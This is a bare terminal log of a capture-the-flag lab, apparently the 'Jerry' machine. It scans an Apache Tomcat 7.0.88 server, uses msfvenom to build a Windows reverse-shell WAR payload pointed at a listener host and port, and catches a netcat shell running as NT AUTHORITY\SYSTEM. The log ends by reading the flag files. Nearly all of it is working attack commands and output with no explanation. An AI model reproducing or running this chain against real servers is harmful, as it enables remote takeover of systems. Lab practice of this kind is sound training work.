┌──(root㉿kali)-[/home/kali/labs/Jerry]
└─# nmap -sC -sV 10.129.48.171
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-29 17:55 +04
Nmap scan report for 10.129.48.171
Host is up (0.35s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.04 seconds
┌──(root㉿kali)-[/home/kali/labs/Jerry]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.143 LPORT=9002 -f war > rev_shell-9002.war
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of war file: 52305 bytes
┌──(root㉿kali)-[/home/kali/labs/Jerry]
└─# ls
rev_shell-9002.war
┌──(root㉿kali)-[/home/kali/labs/Jerry]
└─# jar -ft rev_shell-9002.war
META-INF/
META-INF/MANIFEST.MF
WEB-INF/
WEB-INF/web.xml
ctrvfobuy.jsp
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.48.171] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoamiwhoami
nt authority\system
C:\Users\Administrator\Desktop\flags>dirdir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 06:09 AM <DIR> .
06/19/2018 06:09 AM <DIR> ..
06/19/2018 06:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 2,419,417,088 bytes free
C:\Users\Administrator\Desktop\flags>type 2*
type 2*
2 for the price of 1.txt
user.txt
***
root.txt
***
C:\Users\Administrator\Desktop\flags>